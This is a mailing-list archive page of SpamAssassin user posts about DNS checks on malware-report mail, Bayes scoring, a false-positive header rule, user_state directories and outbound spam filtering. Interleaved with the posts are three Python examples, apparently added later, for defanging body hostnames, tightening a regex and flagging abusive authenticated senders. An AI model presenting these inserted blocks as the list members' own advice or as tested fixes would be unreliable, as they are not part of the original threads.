Participate in the ASF 25th Anniversary Campaign

2024-04-03 Thread Brian Proffitt
Hi everyone,

As part of The ASF’s 25th anniversary campaign[1], we will be celebrating
projects and communities in multiple ways.

We invite all projects and contributors to participate in the following
ways:

* Individuals - submit your first contribution:
https://news.apache.org/foundation/entry/the-asf-launches-firstasfcontribution-campaign
* Projects - share your public good story:
https://docs.google.com/forms/d/1vuN-tUnBwpTgOE5xj3Z5AG1hsOoDNLBmGIqQHwQT6k8/viewform?edit_requested=true
* Projects - submit a project spotlight for the blog:
https://cwiki.apache.org/confluence/pages/viewpage.action?pageId=278466116
* Projects - contact the Voice of Apache podcast (formerly Feathercast) to
be featured: https://feathercast.apache.org/help/
* Projects - use the 25th anniversary template and the #ASF25Years hashtag
on social media:
https://docs.google.com/presentation/d/1oDbMol3F_XQuCmttPYxBIOIjRuRBksUjDApjd8Ve3L8/edit#slide=id.g26b0919956e_0_13

If you have questions, email the Marketing & Publicity team at
mark...@apache.org.

Peace,
BKP

[1] https://apache.org/asf25years/

[NOTE: You are receiving this message because you are a contributor to an
Apache Software Foundation project. The ASF will very occasionally send out
messages relating to the Foundation to contributors and members, such as
this one.]

Brian Proffitt
VP, Marketing & Publicity
VP, Conferences


Re: Looking for advice about limiting DNS queries

2023-01-07 Thread Brian Conry
nt variant 
C) if that is possible.


If you've made it this far, I congratulate you on your endurance and 
thank you for your time.


Thanks,
Brian

[1] https://github.com/bestpractical/rtir#readme


Looking for advice about limiting DNS queries

2023-01-06 Thread Brian Conry

Hi,

First things first:
* SpamAssassin version: 3.4.2
* Debian 10
* SA is created and invoked as a Perl object by a MIMEDefang filter

What I'm looking for is a way to tell SA to only run DNS checks on names 
that it finds in the headers of the message, i.e. to not scan the body 
of the message for names.


The motivation for this is that some of the mail addresses we operate 
are for security response teams that regularly receive mail that 
contains reports about things like signs of malware.


For example a report from a security appliance that it saw a system 
doing DNS queries for a known bitcoin mining malware domain.


The problem is that SA is picking that name from the body of the mail 
message and running the full set of DNS checks on it.  This includes the 
various DNSBL lookups, which are fine, as well as things like DKIM that 
require records from within the domain.


The result of this is that every time one of our mail servers handles a 
message with one of these reports it makes DNS queries that will trigger 
monitoring on our network for devices that might be infected with 
bitcoin mining malware.  Fortunately the servers in question don't also 
handle the warnings that we receive about this possible malware so we 
don't have a feedback loop.


I've looked through the debug-level logging of the rule processing and 
am fairly confident in my assessment of the problem - I can see 
information about which rules are being invoked and triggering DNS 
queries and all of that seems fine, but what I didn't notice was 
anything covering how SA created the list of domains to check from the 
mail message.


I don't think that there's any configuration or options to do what I'm 
asking, but I wanted to ask some experts before making any changes to 
our configs.


Thank you,
Brian Conry
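One way to get the split the post asks for (names in the headers still checked, names in the body not) is to defang hostnames in the body before the filter hands the message to SpamAssassin, so SA's URI extraction never sees a resolvable name. The code below is an added example written for this thread, not SpamAssassin or MIMEDefang code: the message is constructed, the hostname regex only approximates SA's own URI extraction, and `defang_body` is a hypothetical helper that a MIMEDefang filter would have to call (shown in Python, whereas MIMEDefang filters are Perl). It leaves bare IPv4 addresses alone and, when given a set of IOC suffixes, rewrites only hostnames under those suffixes so the usual body-URI reputation checks still run for everything else:

```python
"""Defang hostnames in a message body before it is handed to SpamAssassin.

Hypothetical helper written for this thread (not SpamAssassin or MIMEDefang
code).  The header block is left untouched, so header-based DNS checks still
run; hostnames in the body are rewritten as host[.]example, so SA's URI
extraction no longer finds a resolvable name and issues no lookups for it.
"""
import re

# RFC 5322: the header block ends at the first empty line.
_HEADER_BODY_SPLIT = re.compile(r'\r?\n\r?\n')

# Dotted hostname whose last label is alphabetic; an approximation of SA's
# own URI extraction.  Bare IPv4 addresses such as 10.0.0.5 do not match.
_HOSTNAME = re.compile(
    r'\b(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}\b', re.I)


def defang_hostname(host):
    """pool.miner-c2.example -> pool[.]miner-c2[.]example"""
    return host.replace('.', '[.]')


def _under_suffix(host, suffixes):
    """True if host equals, or is a subdomain of, one of the suffixes."""
    h = host.lower()
    return any(h == s or h.endswith('.' + s) for s in suffixes)


def defang_body(raw, only=None):
    """Return raw with body hostnames defanged; the header block is untouched.

    only: optional set of lower-case domain suffixes.  When given, just
    hostnames under those suffixes are rewritten and every other body
    hostname is kept so the usual URI reputation checks still see it.
    """
    m = _HEADER_BODY_SPLIT.search(raw)
    if m is None:                      # header-only message, nothing to do
        return raw
    headers, body = raw[:m.end()], raw[m.end():]

    def repl(match):
        host = match.group(0)
        if only is not None and not _under_suffix(host, only):
            return host
        return defang_hostname(host)

    return headers + _HOSTNAME.sub(repl, body)


# Constructed sample: an appliance alert quoting a mining C2 hostname.
SAMPLE = (
    "From: sensor@corp.example\r\n"
    "To: security-response@corp.example\r\n"
    "Subject: DNS alert\r\n"
    "\r\n"
    "Host 10.0.0.5 queried pool.miner-c2.example (known mining C2).\r\n"
    "Sample fetched from https://miner-c2.example/payload.bin, ticket 42.\r\n"
)

if __name__ == '__main__':
    print(defang_body(SAMPLE))
    print(defang_body(SAMPLE, only={'miner-c2.example'}))
```

Trade-off: with no suffix set every dotted token in the body is rewritten, so body URIBL checks are effectively off for that mailbox, which is what the post asks for; with a suffix set only the known IOC domains are hidden from DNS, at the cost of maintaining that list. Base64 or quoted-printable parts would have to be decoded before the substitution and re-encoded afterwards; the sample is plain text.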


BAYES_00 Query

2014-04-26 Thread Brian Eliassen

Hello Keepers of SpamAssassin Knowledge,

I've been lurking on this list for years and never had a question pop  
up until today.  About a week ago I said, "enough is enough" regarding  
the amount of spam I've been receiving so I've been doing some  
upgrades.  As such, I recently upgraded to SA 3.4 and did the  
recommended "sa-learn --clear" to clean out the database.  I had a  
huge pile of recent spam and ham so I repopulated the database with  
those.  Afterwards, here is what my "sa-learn --dump magic" looked like:


0.000          0          3          0  non-token data: bayes db version
0.000          0      35575          0  non-token data: nspam
0.000          0       1870          0  non-token data: nham
0.000          0     180984          0  non-token data: ntokens
0.000          0 1314919780          0  non-token data: oldest atime
0.000          0 1398209850          0  non-token data: newest atime
0.000          0          0          0  non-token data: last journal sync atime
0.000          0 1398228671          0  non-token data: last expiry atime
0.000          0     691200          0  non-token data: last expire atime delta
0.000          0    2166321          0  non-token data: last expire reduction count


Yes, I had that much spam stored up.  That sa-learn took several  
hours.  But on to my question; I have been extra careful to note what  
has been slipping by the filter and here is what I've seen over the  
past two days:


3.299 (***) BAYES_00,FORGED_RELAY_MUA_TO_MX
3.92 (***) BAYES_00,FREEMAIL_FROM,RDNS_NONE,TBIRD_SUSP_MIME_BDRY,T_HTML_ATTACH,T_OBFU_HTML_ATTACH
-1 () BAYES_00
0.279 () BAD_CREDIT,BAYES_00
-0.988 () BAYES_00,HTML_EXTRA_CLOSE,HTML_MESSAGE,T_REMOTE_IMAGE
3.299 (***) BAYES_00,FORGED_RELAY_MUA_TO_MX
-0.988 () BAYES_00,HTML_EXTRA_CLOSE,HTML_MESSAGE,T_REMOTE_IMAGE
-0.979 () BAYES_00,FREEMAIL_FROM,T_HTML_ATTACH,T_OBFU_HTML_ATTACH
0.436 () BAYES_00,DIET_1,HELO_MISC_IP,HTML_FONT_LOW_CONTRAST,HTML_MESSAGE
0.436 () BAYES_00,DIET_1,HELO_MISC_IP,HTML_FONT_LOW_CONTRAST,HTML_MESSAGE


The thing that is common is BAYES_00 on all of these.  It's the  
standard -1 score.  Did I do something horrible with my installation  
to allow this sort of crud to slip through?  Isn't that when Bayes  
thinks that the mail isn't spam?  Look at some of the other rules that  
are hitting.  I cannot figure out why BAYES_00 would hit on these.


Thanks in advance.

Oh, this is a sendmail -> mimedefang -> spamassassin/clamav/razor  
installation.  Any recommendations on additional plugins to consider  
and/or SARE-like channels to subscribe to would be greatly appreciated.


Brian



Rule FH_RANDOM_SURE causing FPs

2014-01-16 Thread Brian Bebeau
We're having a problem with the FH_RANDOM_SURE rule causing false positives.
It has a subrule __ALL_RANDOM, which is:

header   __ALL_RANDOM   ALL =~ /(?:[%\#\[\$]R?A?NDO?M?|\%(?:CUSTOM|FROM|PROXY|X?MESSA|MAKE_TXT|FROM_USER))/i

We have a user "ndrier", so legitimate email sometimes has a header that starts 
like:

References: http://www.trustwave.com/>




This transmission may contain information that is privileged, confidential, 
and/or exempt from disclosure under applicable law. If you are not the intended 
recipient, you are hereby notified that any disclosure, copying, distribution, 
or use of the information contained herein (including any reliance thereon) is 
strictly prohibited. If you received this transmission in error, please 
immediately contact the sender and destroy the material in its entirety, 
whether in electronic or hard copy format.
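Why the sub-rule fires on that user name, and one way to tighten it, as an added example that is not from the SpamAssassin rule set: in the first alternative every letter except N and D is optional, so case-insensitively it reduces to one of `% # [ $` followed by just `nd`, which `[ndrier` satisfies. The headers below are constructed, and the tightened pattern (a negative lookahead so a token may not run straight into another letter) is a suggestion, not the project's fix:

```python
"""Why __ALL_RANDOM hits a header containing "[ndrier", and a tighter variant.

Added example, not code from the SpamAssassin rule set; the sample headers
are constructed and the tightened pattern is a suggestion, not the project's fix.
"""
import re

# The sub-rule exactly as quoted in the post (Perl and Python agree on this
# syntax).  In the first alternative R, A, O and M are all optional, so
# case-insensitively it matches any of % # [ $ followed by just "nd".
ALL_RANDOM = re.compile(
    r'(?:[%\#\[\$]R?A?NDO?M?|\%(?:CUSTOM|FROM|PROXY|X?MESSA|MAKE_TXT|FROM_USER))',
    re.I)

# Same alternatives, but a spam-tool token (%RANDOM, [RND], $ND ...) may not
# run straight into another letter, so "[ndrier" no longer qualifies while
# "%RANDOM " and "$RND" still do.
ALL_RANDOM_TIGHT = re.compile(
    r'(?:[%\#\[\$]R?A?NDO?M?(?![a-z])|\%(?:CUSTOM|FROM|PROXY|X?MESSA|MAKE_TXT|FROM_USER))',
    re.I)


def first_match(pattern, text):
    """Return the substring a pattern fires on, or None (for explaining hits)."""
    m = pattern.search(text)
    return m.group(0) if m else None


def hits(pattern, headers):
    """Header names the pattern fires on; 'ALL =~' scans every header line."""
    return [name for name, value in headers if pattern.search(f'{name}: {value}')]


# Constructed headers: one legitimate message mentioning user "ndrier" inside
# brackets, and one with the templating tokens the rule is meant to catch.
SAMPLE_HEADERS = [
    ('Subject', 'Re: [ndrier] updated figures'),
    ('References', '<20140116.1@mail.example>'),
    ('X-Mailer', 'bulker %RANDOM build $RND'),
]

if __name__ == '__main__':
    for name, value in SAMPLE_HEADERS:
        line = f'{name}: {value}'
        print(name, first_match(ALL_RANDOM, line), first_match(ALL_RANDOM_TIGHT, line))
```

The lookahead keeps the tokens the rule was written for (`%RANDOM`, `%RND`, `[RND]`, `$ND`) but refuses a match that continues into a longer word; a `\b` would not do, because `[nd` followed by `r` has no word boundary either way and `%RND` followed by `]` or end of line would have to be handled separately.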


RE: Large # of Spam getting through all of a sudden.

2013-06-10 Thread Duncan, Brian M.

-Original Message-
From: Kris Deugau [mailto:kdeu...@vianet.ca]
Sent: Monday, June 10, 2013 2:21 PM
To: spamassassin-users
Subject: Re: Large # of Spam getting through all of a sudden.

>*nod*  I recently flagged them as a nuisance netblock owner in the
>internal DNSBL[1] here.  I've been seeing them for years.

>I have 54 netblocks of various sizes and distances from the regional IP
>registry on file for them, plus far more suballocations to their
>apparent customers.


>I would recommend scoring RP_MATCHES_RCVD to -0.001;  it may be useful
>in combination with other factors, but as-is and with the default Bayes
>autolearn thresholds it can cause bad Bayes autolearn results.  I'd also
>recommend dropping the Bayes autolearn-as-ham threshold below 0.

>-kgd
>[1] To maintain this local DNSBL, I feed IPs and whatever ARIN, RIPE, APNIC, 
>AfriNIC or LACNIC allocation and reallocation data I can find into a somewhat 
>rough-edged tool I wrote:
>https://secure.deepnet.cx/trac/dnsbl.  It's set up to preemptively tag 
>netblocks over time;  if IPs keep getting reported in any given block, sooner 
>or later it will cross a threshold and IPs not actually reported will still 
>have a bit set in the DNS result.
>In closing in on three years, I think I've removed netblocks for 
>false-positives due to change in ownership of the block maybe twice.

Thanks for the suggestions and information on your experience with maintaining 
your own DNSBL. I have adjusted my autolearn-as-ham below 0 (-5 for now); I can 
see how, in the scenario I am in, that was not helping me.  I also set 
my RP_MATCHES_RCVD to -0.001, I was going to do that anyhow based on other 
reading I have done.

After this I am considering taking a look at building my own DNSBL; when I 
have more time later I will check out the tools you made. I took a quick look 
at the Perl scripts and it looks like they make it a lot easier to do myself.  
Thanks for making that available to everyone.


Brian


===
CIRCULAR 230 DISCLOSURE: Pursuant to Regulations Governing Practice Before the 
Internal Revenue
Service, any tax advice contained herein is not intended or written to be used 
and cannot be used
by a taxpayer for the purpose of avoiding tax penalties that may be imposed on 
the taxpayer.
===
CONFIDENTIALITY NOTICE:
This electronic mail message and any attached files contain information 
intended for the exclusive
use of the individual or entity to whom it is addressed and may contain 
information that is
proprietary, privileged, confidential and/or exempt from disclosure under 
applicable law.  If you
are not the intended recipient, you are hereby notified that any viewing, 
copying, disclosure or
distribution of this information may be subject to legal restriction or 
sanction.  Please notify
the sender, by electronic mail or telephone, of any unintended recipients and 
delete the original
message without making any copies.
===
NOTIFICATION:  Katten Muchin Rosenman LLP is an Illinois limited liability 
partnership that has
elected to be governed by the Illinois Uniform Partnership Act (1997).
===


RE: Large # of Spam getting through all of a sudden.

2013-06-10 Thread Duncan, Brian M.

On 6/10/2013 2:45 PM, Duncan, Brian M. wrote:
> I rarely have seen any SpamAssasin hits on the bodies of these messages.
>
> (cached, score=-0.125,required 6.5, autolearn=not spam, 
> RP_MATCHES_RCVD -0.12)

Do you train the Bayes database manually? Or via autolearn only?

I use SA via AMaViS, and the header changes look slightly different from
yours, but I see no evidence that Bayes scoring is being used in the
above header (if, in fact, that is a sample header with all SA markup
appended).

--Ben


Thanks for the reply,

We use Autolearn only.

I was thinking of starting some manual training after this bout of messages 
getting through, I just did not know how much of a benefit I would see given 
the behavior of the spammer. And I have to set up IMAP2mbox so I can get these 
messages from Exchange over to my sendmail boxes first, hope to do that today..

All the hosts are winding up on Zen and Maps after 24 hours, but they only send 
like 20 messages in each set into my environment..  Then they switch to a new 
sending mail server, I figured they would have burned through their hosts by 
now.  This sender seems to have amassed a large number of servers (not 
workstation botnets) before starting this last week.  I can't recall the last 
time we had this happen.


Brian





Ham hitting too generic rule

2012-02-07 Thread Brian Bebeau
We have a customer who is a legitimate non-spamming investment advisor. Their 
outbound disclaimer has the phrase "investment advice" which hits the rule 
INVESTMENT_ADVICE in 20_phrases.cf. We can certainly zero out the score in 
local.cf, but it seems to me this is a pretty generic phrase, and it has an 
awfully high score (2.199). I can well imagine people getting mail from their 
stock broker or the like with this phrase in it somewhere. Any chance the score 
can at least be reduced?

--
Brian Bebeau
Security Researcher - Spiderlabs Research
Trustwave
bbeb...@trustwave.com
www.trustwave.com




RE: Adding a blacklist via sa-update - would you mind?

2011-12-05 Thread Brian Bebeau

> On Thu, 2011-12-01 at 12:58 -0500, dar...@chaosreigns.com wrote:
>> Since you keep stressing the one, 1, single DNS query per message, I
>> cannot help but nit-pick -- please do have a look at the rules you're
>> talking about. Or maybe, just re-read your own comment 1 on bug 6400.
>> It's not a single query.

> Yup, sorry.  I made the mistake of assuming the mailspike instructions would 
> include everything, but turns out it's just the blacklist:
> http://mailspike.org/usage.html
> Only part I care about is the blacklist.

I would object to automatically including this. We process over a million 
emails a day. The usage page is not too clear if they would mind this load for 
just the blacklist, but I suspect not. In order to turn it off, I'd have to 
edit local.cf, make a new package, and get IT to schedule a deployment for it 
to a large number of scanners. If this went through, we'd need a good amount 
of notice to put that in place.

--
Brian Bebeau
Security Researcher
Spiderlabs Research
Trustwave
bbeb...@trustwave.com







Re: --virtual-config-dir without -u

2011-10-16 Thread Brian J. Murrell
On 11-10-16 03:37 PM, RW wrote:
> 
> Could you not just run a script from cron that does chown ${USER}:spamd
> and chmod g+rw on all the files in the virtual home directories.

You seem to have gotten lost in minor details and lost sight of the
original problem which is that of being able to run spamd in such a way
that it setuids to the user receiving the mail (i.e. run as root, so
without -u) but also looks for the user_state dir (i.e. which is usually
~/.spamassassin) somewhere other than the user's $HOME
(--virtual-config-dir).  These two concepts, for some strange reason,
seem to be mutually exclusive.

If we can solve that, issues like permissions, etc. are easy to resolve.

Cheers,
b.




signature.asc
Description: OpenPGP digital signature


Re: --virtual-config-dir without -u

2011-10-16 Thread Brian J. Murrell
On 11-10-16 03:12 PM, RW wrote:
> 
> Not if you set --virtual-config-dir.

Right.  But such a change (i.e. a different $HOME on the server than on
any other machine) is still on the "transparent to users" change that I
am looking for -- the change that requires no user re-training and no
increase in help desk calls.

It really doesn't seem like it should be so difficult to point
spamassassin to a directory structure other than $HOME to find the
user_state directories.

I'm quite surprised that I am the first person who wants to be able to
do this.  Or rather achieve this kind of configuration.  If in fact
there is another way to achieve it than using the --virtual-config-dir
then I am open to suggestions.

To recap, I simply want to have the user_state (i.e. typically
~/.spamassassin) dirs somewhere other than $HOME on the server but have
those dirs and their files owned by their respective users and therefore
need to have spamd run as the recipient in order to be able to read (and
write in the case of the bayes and autowhitelist, etc. files) them while
allowing the users to read/write them also.  Is this in fact impossible
to do?

Cheers,
b.





Re: --virtual-config-dir without -u

2011-10-16 Thread Brian J. Murrell
On 11-10-16 02:08 PM, Martin Gregorie wrote:
> Yep. A brainfart on my part.

No worries.  :-)

> OK - if the MTA runs spamc (Postfix does this via a service defined as
> part of its configuration - others MTAs have a similar ability) the -u
> facility can be used to select the preference file much as it does now,

AFAICT the -u parameter just tells spamd what user to run as but spamd
will still look for .spamassassin in that (spamc -u specified) user's
$HOME.  So that doesn't really put me any further ahead than I am now.

Besides, some users want to have procmail rules before (and/or after)
spamc is run so pushing spamc into the MTA doesn't really work.

> but procmail isn't needed and you'd run a POP server (I like Dovecot 0-
> zero maintenance: it Just Works) that users use to collect their mail
> and their MUA can sort mail into spam folders, etc. on their local
> machines.

I like to give users MUA-independent methods of sorting (and otherwise
processing) mail, hence the need for .procmail.  That reduces the load
on per MUA mail handling support.

> That only leaves user preferences. Put them where spamd expects to find
> them, and add a symlink to the user's NFS mount point on the server.

Yeah.  I have been considering an approach like this where $HOME on the
server is a local dir with the .spamassassin dir in it and a symlink to
their automounted $HOME like:

$ ls -la $HOME
drwx--   4 brian brian4096 2011-10-16 08:52 .spamassassin
lrwxrwxrwx   1 brian brian      35 2011-10-16 09:17 real_HOME ->
/autohome/brian

and /autohome is an automount dir mounting the $HOME from the user's
machine to the server.

But then anyone logging into the server needs to know this and know that
their $HOME on the server is different than their local, native $HOME.
It seems like I really shouldn't need to go through these gyrations just
to be able to point spamassassin to a different directory tree for their
"state dir" (i.e. what is usually their ~/.spamassassin) dir.

> Of course, this assumes that all the procmail recipe does is to run
> spamc, but you haven't said it does anything else.

Indeed, it doesn't for some users which is why I need to keep procmail
in the loop.  But also, giving spamc to the MTA does not yet prove to
solve anything anyway.

Cheers,
b.





Re: --virtual-config-dir without -u

2011-10-16 Thread Brian J. Murrell
On 11-10-16 01:31 PM, Martin Gregorie wrote:
>
> Have you thought of running spamc remotely? This way you could avoid the
> need to login the the server just to process mail.

Hrm.  I'm not sure I follow.  The server receives the mail and the
server delivers it to the user's mailbox but on the way it passes
through spamd by way of a call to spamc -- all on the server.

> spamc takes -d -p and -u options, which should do exactly what you want:
>   -d gives the host name (default is localhost)
>   -p is the port (default 783)
>   -u is the username

Right.  But since I have spamc being called from procmail, they are all
running as the effective user anyway and thus the -u is moot (and
wouldn't work for any value other than the current user anyway).

> This way you can go on calling spamc from the procmail recipe so it
> would remain invisible to the users.

Sure, but the problem is in being able to provide spamd with a directory
outside of the user's $HOME for his .spamassassin dir.

> You'd store user preferences on the server as individual files

Which is what I want to do, outside of their usual $HOME which actually
lives on their own machine and is NFS mounted on the server (currently).

> or in a
> MySQL database as others have described.

Yeah, just not interested in doing that much re-engineering when simply
being able to provide spamd with a different path for ~/.spamassassin
should suffice.

> The worst case would be that
> your users may have to log in to the server to change their preferences,

Well, they will get their ~/.spamassassin dir as an NFS mount from the
server, so same difference really.

> unless, that is, you go the MySQL way and provide, say, a simple PHP
> script to maintain them via an in-house Apache web server.

Yeah, not going there.  It's overkill and too much work to achieve what
I want.  I do appreciate the suggestions though.

b.





Re: --virtual-config-dir without -u

2011-10-16 Thread Brian J. Murrell
On 11-10-16 12:16 PM, Christian Grunfeld wrote:
> 
> You should have spamd running as root,

But I do that already.  That is what is causing the problem with the new
switch (--virtual-config-dir=...):

spamd: cannot use --virtual-config-dir without -u

> then it can setuid to the
> calling spamc uid which must be the user you want (%l).

Right.  All of that is in place currently with the existing
~/.spamassassin scheme.  That all works.

> So you must
> call spamc with the -u modifier instead of spamd !

I don't call spamd from the delivery end.  Each user has a .procmailrc
which pipes the mail through "spamc" so spamc is already being called by
the recipient's effective user-ID.

> Another way is to have user_prefs and/or bayes in SQL.

Indeed, however that involves a user [re-]education.  I want to effect
the current user interaction (i.e. using ~/.spamassassin) transparently
to the users.

b.





--virtual-config-dir without -u

2011-10-16 Thread Brian J. Murrell
Hi,

In my network, users have their home dirs on their local machines (for
performance) which are automounted to the mail server for purposes of
spamd accessing their ~/.spamassassin dirs.

This of course fails when a machine is turned off so I want to move
users' ~/.spamassassin dirs to the server and create a symlink in each
users' ~ to link back to the server-hosted .spamassassin dir as such:
$ ls -l ~/.spamassassin
lrwxrwxrwx 1 brian brian 35 2011-10-16 09:17 /home/brian/.spamassassin -> /net/mail/home/spamassassin/brian/

But to achieve this and make spamd use this /home/spamassassin/%l dir on
the machine "mail" it seems I need to add the "--virtual-config-dir"
option to spamd.  But that option requires I also use -u and then I
don't get spamd running as %l for access to the files in
/home/spamassassin/%l which are owned by %l.

Anyone got any ideas how I can achieve my goal here of simply relocating
~/.spamassassin dirs to the mail server and yet also having spamd run as
the user receiving the mail?

Much thanks in advance for any ideas.

Cheers,
b.





RE: FuzzyOCR

2011-07-06 Thread Brian Bebeau
> after an apt-get upgrade FuzzyOCR has stopped working. I get the
> following error in the log:
>
> FuzzyOCR: 2011-06-22 17:00:38 [3057] /usr/bin/jpegtopnm: Returned
> [2048], skipping...

I had this problem too, after upgrading SA to 3.3.x and FuzzyOCR to 3.6.0.
Upgrading netpbm fixed it for me.

> System is a Debian Squeeze Running Spamassassin 3.3.1 and FuzzyOCR
> 3.6.0
>
> Any idea?
>





RE: Writing an MTA

2010-07-27 Thread Brian Bebeau
Look in the source directory for spamc. Use the libspamc API. That’s what I do. 
It’s pretty simple.

From: Christopher Dobbs [mailto:crdo...@lybredyne.net]
Sent: Sunday, July 25, 2010 12:39 PM
To: users@spamassassin.apache.org
Subject: Writing an MTA

I am writing an MTA that uses mysql as a backend for storage.
I want to integrate spamassis into my mta.

Is there some C code that I can look at to understand howto do this.




Re: thanks to thinking people.

2010-07-23 Thread Brian Godette

 On 7/22/2010 2:23 PM, Ted Mittelstaedt wrote:



On 7/22/2010 11:29 AM, Benny Pedersen wrote:

On tor 22 jul 2010 20:03:18 CEST, Charles Gregory wrote

A forged sender looks no different than a legitimate sender. Postfix
would have no way to be 'smart' about this (except for some instances
of SPF fail, but then why 'bounce'? Why not reject?).


and why not show logs ?

bounces are never external, since postfix changes the sender to mailer-daemon,
which will end up in some local mailbox if it was sent from a local ip; if it
was sent remotely it's just a reject that makes the remote mta do the bounce,
but it will be the same that happened remotely when it bounces

if bounces go external then the mta is not configured correctly, and there
can be other reasons it does bounce than just not using a reject



Nonsense.

You have internal users.

They are using auth-smtp.

One of those "internal" users is running a laptop

He takes laptop to starflucks and joins the wireless

He sends mail through your server.

How exactly does Postfix "know" that he is an "internal"
user.

Spammer in the wild sees a mail from your user with a
senders address of "ilovec...@example.com" originating
from your smtp-auth system

Spammer in the wild guesses user is using a UID of
"ilovecats" and a password of "pussy"

Spammer in wild authenticates into your auth-smtp
server and spams the world with a forged senders
address.

How exactly does Postfix "know" the difference between
Spammer and the internal user on the laptop at Starflucks?

The notion of "bouncing mail to inside users" is a joke.

Ted



You don't BOUNCE you SMTP REJECT. No DSNs, no backscatter, and any FP 
from a legit user ends up with a support call to the correct party. If 
the outbound message does not exceed your SMTP REJECT level you let it 
go out WITHOUT MODIFICATION, no markup, no nothing.


Re: thanks to thinking people.

2010-07-23 Thread Brian Godette

 On 7/20/2010 1:01 PM, Ted Mittelstaedt wrote:


You are mistaken.  I'm a proponent of port 25 blocks.  What I
am saying is that port 25 blocks work far better than attempting to
spamfilter outbound mail.  It is the other guy who is arguing that
spamfiltering outbound mail is better than port 25 blocks.

Ted

 You need to actually read what I'm writing instead of skimming. The 
subjects being discussed are outbound mail from your own MTA, not 
joe-user's IP address, your own mail server's IP address. How internal 
and/or authenticated users with an infection can cause your MTA to end 
up on blacklists (especially trap fed) regardless of your rate based 
tripwires/log scanning. And how dumb-bots nearly never send outbound (to 
the rest of the world) through your MTA, only the smarter ones that can 
use SMTP-AUTH usually do that. That all leads to needing something a bit 
more than log scanning and rate limiting.


Again, blocking outbound 25 from everything but your own MTA is all well 
and good for containing internal outbreaks from causing everyone else 
grief, but it has little impact on keeping your own MTA clean.
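The rate-based tripwire over authenticated submissions that this post refers to, as an added example rather than code from either poster: it parses constructed Postfix smtpd `client=` log lines (real line format, made-up hosts, users and queue IDs) and flags a SASL user whose peak submission count inside a sliding window, or whose number of distinct client addresses, crosses an illustrative threshold. The thresholds and the per-address check are assumptions to be tuned to your own traffic:

```python
"""Rate tripwire over authenticated submissions, from Postfix smtpd logs.

Added example (not code from either poster): flags a SASL user whose peak
message count inside a sliding window, or whose number of distinct client
IPs, exceeds a threshold.  The log lines are constructed in Postfix's format;
the thresholds are illustrative.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Postfix "client=" line for an authenticated session (syslog timestamps carry
# no year; strptime fills in 1900, which is fine for relative windows).
LOG_RE = re.compile(
    r'^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ postfix/smtpd\[\d+\]: '
    r'(?P<qid>[0-9A-F]+): client=(?P<client>\S+?)\[(?P<ip>[^\]]+)\], '
    r'sasl_method=\S+, sasl_username=(?P<user>\S+)$')


def parse_line(line):
    """(user, timestamp, client_ip) for an authenticated client= line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m['user'], datetime.strptime(m['ts'], '%b %d %H:%M:%S'), m['ip']


def peak_in_window(times, window):
    """Largest number of events that fall within any span of length `window`."""
    times = sorted(times)
    peak = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:      # slide the window's left edge
            start += 1
        peak = max(peak, end - start + 1)
    return peak


def find_abusers(lines, max_msgs=5, window=timedelta(minutes=10), max_ips=2):
    """Map of sasl_username -> list of reasons, for users over a threshold."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            user, ts, ip = rec
            events[user].append((ts, ip))
    flagged = {}
    for user, evs in events.items():
        reasons = []
        peak = peak_in_window([t for t, _ in evs], window)
        if peak > max_msgs:
            reasons.append(f'{peak} msgs within {window}')
        ips = {ip for _, ip in evs}
        if len(ips) > max_ips:                # same account, many source addresses
            reasons.append(f'{len(ips)} client IPs')
        if reasons:
            flagged[user] = reasons
    return flagged


# Constructed log: "ilovecats" submits 6 messages from 3 addresses in 5 min,
# "alice" submits 2 from her laptop; the disconnect line is ignored by the parser.
SAMPLE_LOG = """\
Jul 22 14:00:01 mx postfix/smtpd[4711]: 0A1B2C3D4E: client=unknown[198.51.100.7], sasl_method=PLAIN, sasl_username=ilovecats
Jul 22 14:00:40 mx postfix/smtpd[4711]: 0A1B2C3D4F: client=unknown[198.51.100.7], sasl_method=PLAIN, sasl_username=ilovecats
Jul 22 14:01:15 mx postfix/smtpd[4712]: 0A1B2C3D50: client=unknown[203.0.113.5], sasl_method=PLAIN, sasl_username=ilovecats
Jul 22 14:02:03 mx postfix/smtpd[4712]: 0A1B2C3D51: client=unknown[203.0.113.5], sasl_method=LOGIN, sasl_username=ilovecats
Jul 22 14:03:30 mx postfix/smtpd[4713]: 0A1B2C3D52: client=unknown[192.0.2.9], sasl_method=PLAIN, sasl_username=ilovecats
Jul 22 14:05:10 mx postfix/smtpd[4713]: 0A1B2C3D53: client=unknown[192.0.2.9], sasl_method=PLAIN, sasl_username=ilovecats
Jul 22 14:09:00 mx postfix/smtpd[4713]: disconnect from unknown[192.0.2.9]
Jul 22 14:10:00 mx postfix/smtpd[4714]: 0A1B2C3D54: client=laptop.corp.example[198.51.100.20], sasl_method=PLAIN, sasl_username=alice
Jul 22 14:30:00 mx postfix/smtpd[4714]: 0A1B2C3D55: client=laptop.corp.example[198.51.100.20], sasl_method=PLAIN, sasl_username=alice
"""

if __name__ == '__main__':
    for user, reasons in find_abusers(SAMPLE_LOG.splitlines()).items():
        print(user, '; '.join(reasons))
```

A tripwire like this only fires after the burst, so it shortens the time the MX spends on a blacklist rather than preventing the first batch, which is the gap the rest of the thread argues should be closed by scoring and rejecting outbound mail at SMTP time.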


Re: thanks to thinking people.

2010-07-19 Thread Brian Godette

 On 7/19/2010 4:01 PM, RW wrote:

On Mon, 19 Jul 2010 13:25:26 -0700
Ted Mittelstaedt  wrote:



It's been our experience that spam-scanning outbound mail causes a lot
more problems than setting up mailserver monitoring and being
responsive to it.  Sooner or later one of your customers is going to
call you and bitch because their mail ended up in their
correspondents' spam folder due to them using HTML or including a bad
URL and if it was your server that tagged it spam,

What's the point of adding spam-filtering headers or markup to outgoing
mail?

Indeed, the point would be to score and SMTP reject outbound over some score, 
anything under would be sent unmodified. If it's a FP your own user contacts 
you.



Re: thanks to thinking people.

2010-07-19 Thread Brian Godette

 On 7/19/2010 2:25 PM, Ted Mittelstaedt wrote:



On 7/19/2010 12:56 PM, Brian Godette wrote:

On 7/19/2010 1:29 PM, Ted Mittelstaedt wrote:



On 7/19/2010 8:43 AM, Brian Godette wrote:

On 7/15/2010 6:55 PM, Alexandre Chapellon wrote:

Hi all,

